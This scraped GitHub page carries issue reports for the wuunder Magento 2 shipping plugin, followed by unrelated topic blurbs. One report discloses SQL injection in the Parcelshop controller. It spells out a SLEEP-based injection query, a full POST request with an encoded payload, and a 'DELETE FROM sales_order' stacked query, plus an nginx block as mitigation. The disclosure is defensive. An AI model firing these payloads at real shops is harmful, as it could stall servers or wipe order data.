wuunder / wuunder-webshopplugin-magento2 Goto Github PK
View Code? Open in Web Editor NEWHome Page: https://wearewuunder.com/en/information-request-magento/
License: BSD 3-Clause "New" or "Revised" License
Home Page: https://wearewuunder.com/en/information-request-magento/
License: BSD 3-Clause "New" or "Revised" License
After installing, in the backend the order grid is broken and displays the following message:
Notice: Undefined index: label_id in /vendor/wuunder/magento2-connector/Ui/Component/Listing/Column/Status.php on line 45
On the checkout page at shipping step: parcelshop.js will throw an error:
VM21357:1 Uncaught SyntaxError: Unexpected token < in JSON at position 0
at JSON.parse ()
at _markupParcelshopAddress (parcelshop.js:153)
at Object.success (parcelshop.js:59)
at fire (jquery.js:3232)
at Object.fireWith [as resolveWith] (jquery.js:3362)
at done (jquery.js:9840)
at XMLHttpRequest.callback (jquery.js:10311)
that is because parcelshopData
that is passed to JSON.parse
contains the following error:
Fatal error: Uncaught Exception: Notice: Undefined variable: address in /vendor/wuunder/magento2-connector/Controller/Index/Parcelshop.php on line 179 in vendor/magento/framework/App/ErrorHandler.php on line 61
During a QA review we found a possible SQL injection flaw in the Parcelshop controller. SQL queries are being built using bare string concatenation, with no escaping at all.
We went digging deeper and tried several methods to abuse the security flaw. Here are our findings.
We managed to build a SQL Sleep Injection query like the following:
SELECT * FROM wuunder_quote_id WHERE quote_id = '' AND CASE 5 WHEN 5 THEN SLEEP(60) END OR ''
We managed to increase the response time of the request by 60 seconds. Imagine executing this at a larger scale..
POST http://www.example.com/wuunder/index/parcelshop/setParcelshopId
Connection: keep-alive
Accept: */*
Origin: http://www.example.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://www.example.com/checkout/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,nl;q=0.8,de;q=0.7,fr;q=0.6,es;q=0.5
Cookie: ...
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
parcelshopId=cb927986-6281-4f4a-b2f0-ddfc16ce0642"eId='AND%20CASE%205%20WHEN%205%20THEN%20SLEEP%2860%29%20END%20OR%20'
We also managed to build a SQL Update Injection query like the following:
SELECT * FROM wuunder_quote_id WHERE quote_id = '' OR 1=1; DELETE FROM sales_order WHERE order_id != ''
In your luck, Magento has you covered due to the fact that fetchAll()
and query()
are not able to execute multiple queries.
I will provide a solution this week. For now I suggest disabling the parcel functionality and blocking the controller on webserver level.
NGINX
location /wuunder/index/parcelshop {
deny all;
}
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.